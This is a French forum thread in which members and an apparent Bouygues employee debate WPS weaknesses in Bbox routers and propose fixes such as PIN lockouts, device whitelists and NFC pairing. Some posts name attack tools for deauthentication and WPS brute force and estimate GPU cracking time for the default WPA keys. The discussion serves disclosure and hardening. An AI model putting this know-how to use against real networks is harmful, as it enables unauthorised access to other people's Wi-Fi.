Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#26 25-02-2014 12:43:09

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

Salut,


C'est parfait, après que chacun est dit ce qu'il pensait on va peut-etre pouvoir avancer vers quelque chose de constructif smile

Aphid a écrit :

Le réel problème est le PinCode activé

Déga pourquoi ne pas mettre en place un système efficace qui se bloque tout les X tentative tout comme les Livebox? car sur la plupart des routeurs venant de chez vous le bruteforce du PIN est plutot.. rapide.

Aphid a écrit :

toutes attaques via rogue AP ne peuvent être reprochées à l'AP légitime.

1- Je suis d'accord la dessus, on peut pas controler ce qui se passe a "l'extérieur" mais on peut faire en sorte de rendre plus difficile pour un attaquant externe de planter le réseau via Ddos (aireplay-ng, mdk3, airdrop-ng, et autres techniques) c'est pas les tools qui manquent quand on veut faire crasher un réseau.Chaque box réagit a sa manière face a ce genre d'attaque et les plus coriace sans vouloir leurs faire de pub, ça reste les dernières freeV6.

Bref, pour revenir a nos moutons si un réseau résiste a du deauth pur et dure le principe meme de la rogue AP est remis en question, et si l'attaquant n'est pas patient ou n'a pas toutes les connaissances requises il abandonnera l'attaque.


Aphid a écrit :

Si tu as une alternative au WPS (PBC Method) qui soit sécurisée, non baclée ET généralisée sur les STA (sans que le client n'ait à installer quoique ce soit), j'en serai le premier intéressé.


Je n'ai pas de solutions miracle mais j'ai bien une idée qui pourrait en emm**** plus d'un et moi y compris dans le lot.


2- Je trouve pas normal que je puisse utiliser des routeurs avec le firmware d'origine commercialisés a grande échelle pour pouvoir faire des rogue AP avec le WPS (je ne parle pas uniquement des Bbox la), je m'explique:
La plupart des routeurs laisse un temps trop long d'authentification et répondent trop rapidement a une demande.Et quelque soit la méthode utilisée pour tenter d'accéder a la box via le WPS, il y a la un gros point noir.


Donc réduire ce temps d'authentification serait une première solution mais pas suffisante a mon avis non plus, d'ou l'idée que j'ai en tete mais la on sort un peu du contexte, il faudrait modifier un peu le protocole (oui oui le WFA, balablabla...) et mettre en place un moyen d'identifier chaque dispositif souhaitant une connexion via WPS avant que celle la ne se produise.

Par exemple:

Mr bean souhaite se connecter a son wifi mais Mr bean ne connait pas la clé de son réseau, il fait donc comme la plupart des gens, il regarde derrière le boitier.

Mr bean après s'etre trompé entre les adresses MAC et le numéro de série a enfin trouver son code wifi et s'y connecte.
Mr bean ne veut plus a avoir a rentré de clé wifi pour ses autres équipement car ça le fait c***, il se connecte donc a l'interface de la box pour voir ce qu'il peut faire, et la une option s'affiche lui disant:

"Toute première connexion wifi doit s'effectuer avec votre clé WPA personnel, vous pouvez utiliser le bouton WPS par la suite mais pour des raisons de sécurité nous vous invitons a enregistré votre périphérique ci-dessous."

On enregistre le ou les périphériques qui se connecteront par la suite via WPS  (UUID, ou 6 derniers chiffres de l'adresse MAC peu importe) de manière a ce que la box sache qui vient la voir.

La box ne répondrait alors qu'au périphérique qu'elle connait et ainsi plus de risque pour un petit moment du moins wink et Mr bean a beau etre complètement a la masse, il pourra se connecter sans qu'un très très très méchant voisin essai de cracker son code WPS. big_smile

Qu'en pensez-vous ?

Dernière modification par koala (25-02-2014 13:00:08)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#27 25-02-2014 18:08:53

airbase
Membre
Inscription : 03-02-2014
Messages : 23

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

De toute façon à partir de demain les offres couterons 12€ de - chaque mois grace à Martin Bouygues !!
Hae de voir ce qu'il va nous sortir. Donc pluspersonne n'aura interet a se connecter chez le voisin puisque la connection sera donnee presque

:Okjesors:

Hors Ligne

#28 25-02-2014 20:02:39

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

airbase a écrit :

De toute façon à partir de demain les offres couterons 12€ de - chaque mois grace à Martin Bouygues !!
Hae de voir ce qu'il va nous sortir. Donc pluspersonne n'aura interet a se connecter chez le voisin puisque la connection sera donnee presque

:Okjesors:


Le sujet de ce topic est la faille des routeurs BBox...

Discuter de prix, je vois pas l'interêt, excuse moi, mais cela n'a aucuns rapports ...


Envisager de se connecter sur un reseau qui n'est pas le sien, çà, c'est carrement contraire à nos règles et donc inadapté à ce genre de topic et de forum...


Encore une fois, tu perds une occasion de te taire, désolé...


Ce topic traitant de(s) faille(s) concernant les routeurs de la marque Bouygues, je demande donc à un moderateur de supprimer ton message inutile et devalorisant pour l'ethique de notre forum et de ses membres...



Par avance, MERCI wink


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#29 25-02-2014 20:13:34

JeanCharles
Membre Indétronable
Lieu : Sainte-Anne
Inscription : 13-07-2012
Messages : 198

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

spawn a écrit :

tl;dr : WPS non désactivable sur les bbox.
C'est triste.

roll

Aphid a écrit :

La faille sous reaver avec la Bbox TG787 remontée par jsaispas le 06-11-2012  montre bien que ce problème était aussi présent sous le firmware Thomson.

roll [edit] donc en 2014, un client qui se présente et s'abonne chez "Bouygues Telecom" à le droit à ce genre de vieilleries en guise de "bbox", dommage que les "bbox sensation" ne soient pas la rêgle...http://www.bbox-actus.com/?filtre=firmware

koala a écrit :

Qu'en pensez-vous ?

roll Ca commence à faire beaucoup "quand même"! MDRRR...

Dernière modification par JeanCharles (25-02-2014 21:11:33)


« γνωθι σεαυτον »

Hors Ligne

#30 25-02-2014 20:16:57

airbase
Membre
Inscription : 03-02-2014
Messages : 23

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

salut Furyo

Dans le genre tu n'es pas mal non plus, ton unique message :

Furyo a écrit :

Bonjour et Bienvenu Monsieur wink

Moi c'est Henri wink

Et toi ?

Le problème c'est que ce sont les seuls messages que tu laisses sur le forum, avec le "Bonjour et Bienvenu" qui n'aide évidement personne ...


Furyo a écrit :

Envisager de se connecter sur un reseau qui n'est pas le sien

Par qui sont exploités les failles ?

Nous avons trouvé la mascotte smile

Ps: Effectivement on peut supprimer les 2 messages et ceux de Furyo qui sont H.S roll

Dernière modification par airbase (25-02-2014 20:18:33)

Hors Ligne

#31 25-02-2014 20:19:25

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

airbase a écrit :

salut Furyo

Dans le genre tu n'es pas mal non plus, ton unique message :

Furyo a écrit :

Bonjour et Bienvenu Monsieur wink

Moi c'est Henri wink

Et toi ?

Le problème c'est que ce sont les seuls messages que tu laisses sur le forum, avec le "Bonjour et Bienvenu" qui n'aide évidement personne ...

Nous avons trouvé la mascotte smile

Ps: Effectivement on peut supprimer les 2 messages et ceux de Furyo qui sont H.S roll


Pierre desproges disait  : mieux vaut fermer sa gueule et passer pour un con plutôt que de l'ouvrir et de ne laisser aucuns doutes à ce sujet...


Tu en es la parfaite demonstration...


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#32 25-02-2014 20:23:10

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

Ecoutez... le début du topic a été houleux car plusieurs différences de point de vue qu'il fallait bien exprimer mais maintenant que c'est plus ou moins régler j'aimerais qu'on fasse preuve d'un peu de maturité de façon a laisser Aphid venir discuter avec nous et qu'il pense pas que ce forum soit une cours de récréation géante...

Merci a vous wink

Hors Ligne

#33 26-02-2014 20:37:25

Aphid
Membre
Inscription : 23-02-2014
Messages : 15

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

koala a écrit :

Déga pourquoi ne pas mettre en place un système efficace qui se bloque tout les X tentative tout comme les Livebox? car sur la plupart des routeurs venant de chez vous le bruteforce du PIN est plutot.. rapide.

On ne veut pas supporter le code PIN. La méthode de reaver montre une faiblesse de la norme en jouant sur les rôles des stations au sens WPS.

Après prenons ta proposition, quand est ce que le connexion WPS est de nouveau autorisée?


koala a écrit :

1- Je suis d'accord la dessus, on peut pas controler ce qui se passe a "l'extérieur" mais on peut faire en sorte de rendre plus difficile pour un attaquant externe de planter le réseau via Ddos (aireplay-ng, mdk3, airdrop-ng, et autres techniques) c'est pas les tools qui manquent quand on veut faire crasher un réseau.Chaque box réagit a sa manière face a ce genre d'attaque et les plus coriace sans vouloir leurs faire de pub, ça reste les dernières freeV6.

On va regarder ce point.



koala a écrit :

Je n'ai pas de solutions miracle mais j'ai bien une idée qui pourrait en emm**** plus d'un et moi y compris dans le lot.


2- Je trouve pas normal que je puisse utiliser des routeurs avec le firmware d'origine commercialisés a grande échelle pour pouvoir faire des rogue AP avec le WPS (je ne parle pas uniquement des Bbox la), je m'explique:
La plupart des routeurs laisse un temps trop long d'authentification et répondent trop rapidement a une demande.Et quelque soit la méthode utilisée pour tenter d'accéder a la box via le WPS, il y a la un gros point noir.


Donc réduire ce temps d'authentification serait une première solution mais pas suffisante a mon avis non plus, d'ou l'idée que j'ai en tete mais la on sort un peu du contexte, il faudrait modifier un peu le protocole (oui oui le WFA, balablabla...) et mettre en place un moyen d'identifier chaque dispositif souhaitant une connexion via WPS avant que celle la ne se produise.

Par exemple:

Mr bean souhaite se connecter a son wifi mais Mr bean ne connait pas la clé de son réseau, il fait donc comme la plupart des gens, il regarde derrière le boitier.

Mr bean après s'etre trompé entre les adresses MAC et le numéro de série a enfin trouver son code wifi et s'y connecte.
Mr bean ne veut plus a avoir a rentré de clé wifi pour ses autres équipement car ça le fait c***, il se connecte donc a l'interface de la box pour voir ce qu'il peut faire, et la une option s'affiche lui disant:

"Toute première connexion wifi doit s'effectuer avec votre clé WPA personnel, vous pouvez utiliser le bouton WPS par la suite mais pour des raisons de sécurité nous vous invitons a enregistré votre périphérique ci-dessous."

On enregistre le ou les périphériques qui se connecteront par la suite via WPS  (UUID, ou 6 derniers chiffres de l'adresse MAC peu importe) de manière a ce que la box sache qui vient la voir.

La box ne répondrait alors qu'au périphérique qu'elle connait et ainsi plus de risque pour un petit moment du moins wink et Mr bean a beau etre complètement a la masse, il pourra se connecter sans qu'un très très très méchant voisin essai de cracker son code WPS. big_smile

Qu'en pensez-vous ?

Malheureusement peu de personne utilise l'interface d'administration.
J'en conviens que l'IHM actuelle n'est pas très incitative à l'utilisation par les clients.

Ta proposition est semble t il plus sécurisée mais trop contraignante pour les gens qui n'aiment pas trop à faire trop d'actions pour pouvoir accéder à leur WiFi.


De mon point de vue, il serait plus intéressant d'exploiter le fait qu'on peut piloter une TV via la STB pour demander l'autorisation à l'utilisateur via sa Télécommande de connecter tel ou tel device avec une gestion de blacklist/whitelist.


La norme > l'interprétation de la norme > l'implémentation de l'interprétation

Hors Ligne

#34 26-02-2014 20:39:55

Aphid
Membre
Inscription : 23-02-2014
Messages : 15

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

JeanCharles a écrit :
spawn a écrit :

tl;dr : WPS non désactivable sur les bbox.
C'est triste.

C'est noté.

JeanCharles a écrit :

roll [edit] donc en 2014, un client qui se présente et s'abonne chez "Bouygues Telecom" à le droit à ce genre de vieilleries en guise de "bbox", dommage que les "bbox sensation" ne soient pas la rêgle...http://www.bbox-actus.com/?filtre=firmware

Désolé , je n'ai pas compris ta remarque avec le lien vers la liste de firmware.


La norme > l'interprétation de la norme > l'implémentation de l'interprétation

Hors Ligne

#35 26-02-2014 21:05:22

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

Je pense que nous sommes tous d'accord, pour dire que nous sommes impatients de voir si nos remarques ont été prises en compte et que les futures MAJ des routeurs de votre entreprise, soient réellement efficace pour eviter ce genre de faille ...


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#36 26-02-2014 21:26:23

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

Aphid a écrit :

On ne veut pas supporter le code PIN. La méthode de reaver montre une faiblesse de la norme en jouant sur les rôles des stations au sens WPS.
Après prenons ta proposition, quand est ce que le connexion WPS est de nouveau autorisée?

On pourrait garder le PIN mais en modifiant certains paramètres car quand on voit Reaver on s'aperçoit qu'il communique beaucoup avec la box et si la box retourne a Reaver trop de M4 en une période courte, la box se bloque alors et refuse toute communication.Mais ça ne suffit pas car comme prouvé dans le passé quelqu'un peut trouver l'algorithme de génération du PIN et la... hmm donc un PIN complètement aléatoire serait le bienvenue.

Aphid a écrit :

Ta proposition est semble t il plus sécurisée mais trop contraignante pour les gens qui n'aiment pas trop à faire trop d'actions pour pouvoir accéder à leur WiFi.

C'est ça le problème, "wifi facile = wifi fragile" de mon point de vue.

Aphid a écrit :

De mon point de vue, il serait plus intéressant d'exploiter le fait qu'on peut piloter une TV via la STB pour demander l'autorisation à l'utilisateur via sa Télécommande de connecter tel ou tel device avec une gestion de blacklist/whitelist.

Blacklist mais par rapport a quel paramètre? adresse MAC? ça suffirait pas, en moins d'une minute on peut changer d'adresse MAC avec un système linux.

Et pourquoi pas faire sauter la méthode PIN et PBC et utiliser uniquement la méthode NFC?

Avec ça pas de bruteforce de pin et pas de risque d'intrusion sur le réseau non désirée.La box ne répond que dans un champ d'action très limité et point barre.

Dernière modification par koala (26-02-2014 21:32:10)

Hors Ligne

#37 26-02-2014 22:36:11

JeanCharles
Membre Indétronable
Lieu : Sainte-Anne
Inscription : 13-07-2012
Messages : 198

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

Aphid a écrit :
JeanCharles a écrit :
spawn a écrit :

tl;dr : WPS non désactivable sur les bbox.
C'est triste.

C'est noté.

JeanCharles a écrit :

roll [edit] donc en 2014, un client qui se présente et s'abonne chez "Bouygues Telecom" à le droit à ce genre de vieilleries en guise de "bbox", dommage que les "bbox sensation" ne soient pas la rêgle...http://www.bbox-actus.com/?filtre=firmware

Désolé , je n'ai pas compris ta remarque avec le lien vers la liste de firmware.

Regardes de plus près a partir de la version 8.7.24 des firmwares bbox sensation" (interface box) WPS : mise en place d'un bouton pour configurer..." [edit] "pour configurer...rien du tout enfait" big_smile
Donc voila... même si la technicolor sera bientot la box la moins chère du marcher... ça laisse à désirer l'interface...bref. Slt

Dernière modification par JeanCharles (26-02-2014 22:50:40)


« γνωθι σεαυτον »

Hors Ligne

#38 26-02-2014 23:39:29

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

spawn a écrit :

J'ai invité bouygues à venir en discuter.
Aussi je me permet d'arrondir quelques angles dans vos messages, ne m'en veuillez pas.
Soyons sérieux, polis et professionnels comme d'habitude (:
[edit : kcdtv je te laisse modifier toi même tes messages si tu le souhaites, je ne prendrais pas le risque d'inviter bouygues et de causer du tort au forum]

Spawn a écrit :

Je suis certain que kcdtv va faire des efforts pour être moins abrupt smile

M1ck3y a écrit :

On se calme.

@kcdtv: tu ne portes visiblement pas cette entreprise dans ton coeur, c'est ton droit, mais certaines remarques contenues dans ce sujet sont tout de meme off topic.

  Je rappelle juste, calmement big_smile, que ce billet je l'ai rédigé et publié ici sans avoir l'intention d'en faire l'ouverture d'un débat avec un membre de bouygues. smile
  Ce qui me semble personnellement  "offtopic" c'est plutôt de revenir sur ces propos et de me rappeler à l'ordre  pour ces propos ou, on dirait, pour mon comportement en tant que modérateur dans ce thème.
  J'ai été tout à fait " calme " et poli avec Aphid. smile
   Si la tonalité des réponses et du billet en introduction ne vous convient pas; il me semble assez évident que le plus indiqué et respectueux c'est d'ouvrir un nouveau thème de discussion plus à vôtre goût en posant le débat comme il vous semble et surtout pas de censurer les propos des membres du forum pour "arrondir les angles". smile
   

Permettez moi de revenir à la réponse de Aphid à me question

Aphid a écrit :

Je ne parle pas au nom de Bouygues, je ne suis qu'un employé qui va s'assurer que ce sujet soit traité.
Je ne suis pas community manager , ni chargé de communication.

Pour la règle sur le forum, ou bien le renvoi vers la Netiquette, je parlais bien entendu des insultes envers les gens travaillant chez ou pour bouygues.

Il est vrai que je ne me suis pas présenté, mais vu le ton hostile de ce post. smile

Tout ce qui sera politique, commercial ou autre, je n'y répondrai pas. Seul l'aspect technique m’intéresse.

Vos propos confirment ce que laissait présager vôtre réponse sur twitter: Si vous dites que c'est en cours d'analyse cela veut dire que vous n'avez à l'heure actuelle personne dans votre équipe qui sait réellement ce qu'est le WPS
Mon propos indique que le sujet est en cours de traitement, rien d'autre.  Ce sujet m'a été remonté vendredi à 16h, donc patience. smile

Le produit ne devrait pas proposer le PIN comme méthode de WPS, pour la raison évoquée ci-dessus. Seule la méthode PBC devrait être implémentée (et ce depuis 2008 smile ).


Concernant l'attaque par WPS en mode PBC, il y a certainement des failles, mais les contraintes de sécurité imposant d'avoir des clés de plus en plus grosses, nécessitent une solution alternative pour le client lambda.

Cependant la norme Wifi indique que lors de la méthode PBC seul 1 client doit pouvoir s'authentifier. Si 2 STA tentent l'appairage , aucune des 2 ne devraient être connectées.
La led de la Bbox devrait passer à l'état rouge.

Nous regardons aussi si d'autres produits sont  touchés.

¿Nada? Il n'y a rien qui vous choque?

Pourtant ça fait mal aux yeux... smile

Ça fait pourtant 3 jours que c'est affiché dans le forum...

Bon; c'est pas grave, on y revient tout de suite (presque) ***


Bonsoir Aphid,

Aphid a écrit :

je parlais bien entendu des insultes envers les gens travaillant chez ou pour bouygues.


  Ce n'était pas mon intention que de te viser en tant que personne, vu que je ne te connaissais pas, je t'assure que je n'ai rien contre toi et te souhaite la bienvenue smile
   Les "gens qui travaillent pour Bouygues" ne se définissent pas par leur emploie chez Bouygues, travailler chez Bouygues est une contingence qui ne les définit pas en tant qu'individu. smile
   Quant au groupe bouygues il jouit de la réputation qui est la sienne et tu ne peux bien évidement pas y faire grand chose

 

Aphid a écrit :

Tout ce qui sera politique, commercial ou autre, je n'y répondrai pas. Seul l'aspect technique m’intéresse.

Donc seul l'aspect technique t'intéresse.

A moi aussi il m'intéresse, mais pas seulement, parce que là on parle de problèmes techniques archi connus ; la faille WPS, ça ne nous rajeunit pas, et on apprend rien de neuf  tongue   
 
  Dans ce cas ne pas évoquer le fonctionnement de l'entreprise c'est ne rien comprendre du tout au problème wink

Car c'est bien évidement le fonctionnement interne de l'entreprise qui explique la présence d'une telle faille de sécurité que tous les script kiddles du monde connaissent depuis plusieurs années. big_smile

 
  - 1 Premier enseignement : il n'y pas de script kiddle chez Bouygues... big_smile
   
  - 2 Deuxième enseignement :

AQphid a écrit :

Il est vrai qu'il faudrait passer plus de temps à surfer sur la toile pour trouver les failles en cours.

 
  WoW
  Donc chez bouygues dans le département sécurité, chercher sur internet et s'informer et considéré comme du "web-surfing"... alors que c'est la base de la connaissance dans ce domaine.
C'est très inquiétant. hmm
  Et nous parlons de seulement lire les communiqués officiels des fabricants de routeurs, même si elle fût tardive, la communication sur la faille existe
TP-Link "réagit" contre la faille WPS
  How do NETGEAR Home routers defend WiFi Protected Setup PIN against brute force vulnerability?

Concernant l'attaque par WPS en mode PBC, il y a certainement des failles, mais les contraintes de sécurité imposant d'avoir des clés de plus en plus grosses, nécessitent une solution alternative pour le client lambda.

Là nous revenons à des choses techniques mais qui ne sont pas nouvelles

Si il y a "certainement des failles" c'est que ce n'est pas sûr... wink C'est une bénédiction que pour le moment les gens n'utilisent pas le WPS push bouton.. Sinon attention au massacre avec mdk3/airebase/aireplay-ng pour obliger l'utilisateur lambda a appuyer sur le bouton WPS de l'AP   lol
Sinon ça va y aller gaiement, " comme en 14 " big_smile
La seule chose qui est suffisamment sûre c'est pour le moment  une clef WPA robuste.
Qui ne doit pas être forcément très longue mais utiliser un jeux de caractères plus varié et moins prévisible que le système hexadécimal majuscules de vos Bbox thomson

10 symboles hexadécimaux ( clef par défaut Bbox Thomson) majuscules restent vulnérables à une attaque  venant d'un attaquant équipé en GPU

Pas besoin d'un serveur, un simple  gammer avec un alienware qui a deux cartes vidéo obtient déjà plus de 200 000 PMK.
  Maintenant si je suis quelqu'un de moyennement équipé pour ça, à niveau artisanal, si j'ai une plaque avec 7-8 port PCIExpress et autant de cartes type HD 6XXX  qui fleurtent chacune avec les 150000 PMK j'obtiens déjà un million de PMK....
à cette vitesse nous parlons d'un brute force de  16¹⁰ / ( 3 600 x1 000 000 ) = 305 heures
En optimisant le dictionnaire nous parlons d'une semaine, avec un peu de chance 3 jours...
C'est encourageant pour un attaquant tongue 

  LE NIVEAU DE SéCURITÉ DES CLES WPA PAR DéFAUT ( 10 SYMBOLES HXADéCIMAUX ) DES Dbox THOMSON EST INSUFFISANT

  Je ne fais que rappeler des faits basiques... hmm


  Revenons à ce que tu nous dis sur le WPS PBC


aphid a écrit :

PS: Pour le bouton WPS:
nintendo-3ds-test-12.jpg


PS : il faudrait quand même mieux mettre le symbole approprié  big_smile
Voici le logo WPS wink

wifi-protected-setup.jpg

Maintenant sur le "technique"

(***) J'y viens

Bon Toujours pas?


Je met en rouge  l'argument technique, le seul, que tu nous donnes lorsque  j'affirme que vous ne savez pas comment fonctionne le WPS:

Cependant la norme Wifi indique que lors de la méthode PBC seul 1 client doit pouvoir s'authentifier. Si 2 STA tentent l'appairage , aucune des 2 ne devraient être connectées.

Sérieusement? realy?
"La norme wifi indique", C'est quoi? : la loi divine, ... Martin Bouygues tongue ?
Si on pense deux secondes sérieusement à comment fonctionne le WPS et au déroulement du processus et on pense à ce que tu dis on a envie de sourire. smile
  Excuse moi Aphid, sans vouloir t'offenser, mais tu sais parfaitement que tu avances un argument sans savoir ni avoir pris le temps de chercher un peu ( "web-surfer"  wink ) .
Et une simple recherche google du côté de la "norme Wifi" roll aurait suffit pour t'informer, sans trop te fouler

How does Wi-Fi Protected Setup work?

h_1393343141_7711505_59c53c6b79.png


h_1393343366_8720537_d694ccd291.png


  Aphid, je vais être franc : C'est un petit peu il me semble nous prendre quand même quelque part pour des saucisses de Strasbourg pas bien fraîches en essayant de nous enfumer avec des arguments sortis d'un oeuf kinder ... c'est pas très sympa wink
  Tu aurais peut être du employer le conditionnel, ne crois-tu pas? 
C'est dommage hmm
     

Nous pourrions bien évidement évoquer de véritables problèmes de sécurité nouveaux et majeurs
Et que tu nous parles par exemple de qu'elle est la politique de Bouygues par rapport aux différents programmes de PRISM, par rapport au programmes de la DGSE , il y a beaucoup à dire et redire mais malheureusement aucune communication sur le sujet...

... Ou alors là aussi le problème a été remonté vendredi à 16 heure et est en cours d'études? ... big_smile
( c'est une blague smile )


Dans tous les cas mettez vous vite au boulot car je vous rappelle que des millions d'utilisateurs sont en danger permanent depuis plus d'un an.

Hors Ligne

#39 26-02-2014 23:39:50

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

La seule solution de ce topic est simple !




FREE et tu as tout compris!

Pas de WPS par defaut, une box ne supportant pas les deauth...

Pas de WEP, par defaut..

Disque dur integre avec gestion des telechargements (torrents inclus)...

Bref aucunes comparaisons avec nos amis de chez Bouygues en terme de services fournis ni même en terme de relation clientele......


et on vas me faire croire que le genti Aphid membre de la communautée Bouygues, vas faire remonter le soucis d'une faille qui est beante connue et cela depuis des années comme par hasard...


Autant croire au pere noël..




BOUYGUES, JAMAIS de la vie

Admin reseau pour ma boite je viens de virer leur consultant "entreprise" pour me touner vers la concurrence.. Tant pis pour eux...

Dernière modification par Furyo (26-02-2014 23:45:28)


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#40 26-02-2014 23:55:15

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

J'adore ce sujet, c'est tellement bon de le lire lol

Hors Ligne

#41 27-02-2014 00:00:08

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

Pas autant que moi, koala wink


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#42 27-02-2014 01:11:39

Aphid
Membre
Inscription : 23-02-2014
Messages : 15

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

kcdtv a écrit :

Sérieusement? realy?
"La norme wifi indique", C'est quoi? : la loi divine, ... Martin Bouygues tongue ?
Si on pense deux secondes sérieusement à comment fonctionne le WPS et au déroulement du processus et on pense à ce que tu dis on a envie de sourire. smile
  Excuse moi Aphid, sans vouloir t'offenser, mais tu sais parfaitement que tu avances un argument sans savoir ni avoir pris le temps de chercher un peu ( "web-surfer"  wink ) .
Et une simple recherche google du côté de la "norme Wifi" roll aurait suffit pour t'informer, sans trop te fouler

J'avoue ne pas avoir "web-surfer" wink, juste regardé la spécification v2.0.2 qui indique Within the PBC Monitor Time, if the Registrar receives PVC probe requests from more than one Enrolle, [...], then the Registrar MUST signal a "session overlap" error. => WSC_NACK
(page 94 smile )

C'est de là que découle ma réponse car tu précisais

kcdtv a écrit :

un protocole qui admet pendant x minutes n'importe le quel des dispositifs qui émet des paquets WPS PBC dans son rayon...

Il n'accepte pas n'importe quel device qui émet des paquets, il faut une certaine séquence pour que d'autres devices puissent  s'appairer à ce wifi via le PBC=> Appairage en série, non en parallèle

Donc c'est rigolo 5 min de prendre les gens pour des truffes mais j'avoue que là j'en ai marre. wink

kcdtv a écrit :

PS : il faudrait quand même mieux mettre le symbole approprié  big_smile
Voici le logo WPS wink

Un logo tel que celui là, ou Dolby etc... impose des contraintes que les opérateurs/fournisseurs ne sont pas forcément prêt à supporter.

Pour le reste de tes autres remarques sur la politique de bouygues telecom, le fonctionnement interne, la critique du travail des gens sans savoir, je n'y répondrai pas.

PS: on dirait vraiment que t'as un énorme problème avec bouygues, ils ont construit ton appart de travers ou quoi? lol


La norme > l'interprétation de la norme > l'implémentation de l'interprétation

Hors Ligne

#43 27-02-2014 02:50:36

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

Non ma maison n'est pas construite par les sans papiers de Martin wink


Donc c'est rigolo 5 min de prendre les gens pour des truffes mais j'avoue que là j'en ai marre. wink

Au moins tu te lâche un peu, c'est positif wink
Je ne te prends pas pour une truffe, je pense que tu dois être quelqu'un d'intelligent, doué et compétant mai qui ne domine pas du tout son sujet, mais c'est normal, personne ne nait avec la science infuse et le problème a "été remonté vendredi à 16 heures" wink

J'avoue ne pas avoir "web-surfer" , juste regardé la spécification v2.0.2 qui indique Within the PBC Monitor Time, if the Registrar receives PVC probe requests from more than one Enrolle, [...], then the Registrar MUST signal a "session overlap" error.  => WSC_NACK
(page 94  )

Il n'accepte pas n'importe quel device qui émet des paquets, il faut une certaine séquence pour que d'autres devices puissent  s'appairer à ce wifi via le PBC=> Appairage en série, non en parallèle

Ce n'est pourtant pas ce que je lis dans le manuel mais il me manque quelques pages et je ne sais pas ou j'ai le .zip ou si je l'ai encore...
Pourrais tu nous mettre le manuel en lien s'il te plais? smile

Hors Ligne

#44 27-02-2014 03:01:04

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

Aphid a écrit :

Il n'accepte pas n'importe quel device qui émet des paquets, il faut une certaine séquence pour que d'autres devices puissent s'appairer à ce wifi via le PBC=> Appairage en série, non en parallèle


En théorie peut-etre que oui mais en pratique j'en suis pas si sur, on est bien d'accord sur l'appairage en série et non en parallèle pour le PBC pas de problème la dessus mais sur le séquencement de l'appairage en lui meme il y a pour moi un gros défaut.

"Enrollee: A new device that needs to be added to the network and does not have settings for the wireless network."

On en revient au truc du "wifi facile = wifi fragile"...


@Kcdtv: la plupart sont des immigrés qui galèrent et qu'ils paient uniquement au smic merdique de leurs pays pour construire une prison en béton en général baclé près d'une autoroute. tongue

Dernière modification par koala (27-02-2014 03:01:45)

Hors Ligne

#45 27-02-2014 03:59:44

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

Moi je suis sans papiers et je vends des culottes au marché nux

Hors Ligne

